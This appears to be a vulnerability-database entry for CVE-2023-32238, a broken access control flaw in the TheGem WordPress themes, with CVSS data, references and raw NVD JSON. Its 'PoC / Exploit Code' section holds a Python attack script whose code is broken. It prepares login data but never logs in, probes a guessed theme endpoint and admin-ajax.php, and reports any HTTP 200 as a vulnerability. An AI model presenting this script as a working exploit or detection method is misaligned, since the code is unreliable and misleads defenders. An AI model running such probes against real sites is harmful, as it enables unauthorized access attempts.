CVE-2023-32238

Description

Vulnerability in CodexThemes TheGem (Elementor), CodexThemes TheGem (WPBakery).This issue affects TheGem (Elementor): from n/a before 5.8.1.1; TheGem (WPBakery): from n/a before 5.8.1.1.

CVSS Details

CVSS Score

5.4

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

TheGem (Elementor) < 5.8.1.1

TheGem (WPBakery) < 5.8.1.1

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2023-32238 PoC - TheGem主题访问控制绕过
# 低权限用户可利用此漏洞执行越权操作

import requests
import sys

TARGET_URL = "https://target-site.com"
USERNAME = "low_privilege_user"
PASSWORD = "password"

def exploit():
    """
    利用TheGem主题的访问控制漏洞
    需要先获取有效的低权限用户session
    """
    session = requests.Session()
    
    # 1. 登录获取session
    login_url = f"{TARGET_URL}/wp-login.php"
    login_data = {
        'log': USERNAME,
        'pwd': PASSWORD,
        'wp-submit': 'Log In'
    }
    
    # 2. 尝试访问受限功能（需要管理员权限）
    # 替换为目标网站的具体端点
    admin_endpoints = [
        '/wp-admin/admin-ajax.php',
        '/wp-json/thegem/v1/settings',
    ]
    
    # 3. 构造恶意请求
    for endpoint in admin_endpoints:
        try:
            response = session.get(f"{TARGET_URL}{endpoint}", timeout=10)
            # 检查是否成功访问了本应受限的功能
            if response.status_code == 200:
                print(f"[!] 可能存在漏洞: {endpoint}")
                print(f"Response: {response.text[:500]}")
        except Exception as e:
            print(f"Error accessing {endpoint}: {e}")

if __name__ == "__main__":
    exploit()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2023-32238
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2023-32238
[3] CVE Details https://www.cvedetails.com/cve/CVE-2023-32238/
[4] VulDB https://vuldb.com/cve/CVE-2023-32238
[5] https://vdp.patchstack.com/database/wordpress/theme/thegem-elementor/vulnerability/wordpress-thegem-elementor-theme-5-7-2-broken-access-control-vulnerability?_s_id=cve

Raw JSON Data

JSON

{"cve": {"id": "CVE-2023-32238", "sourceIdentifier": "[email protected]", "published": "2025-12-30T00:15:50.823", "lastModified": "2026-04-28T19:20:25.833", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Vulnerability in CodexThemes TheGem (Elementor), CodexThemes TheGem (WPBakery).This issue affects TheGem (Elementor): from n/a before 5.8.1.1; TheGem (WPBakery): from n/a before 5.8.1.1."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.5}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-284"}]}], "references": [{"url": "https://vdp.patchstack.com/database/wordpress/theme/thegem-elementor/vulnerability/wordpress-thegem-elementor-theme-5-7-2-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}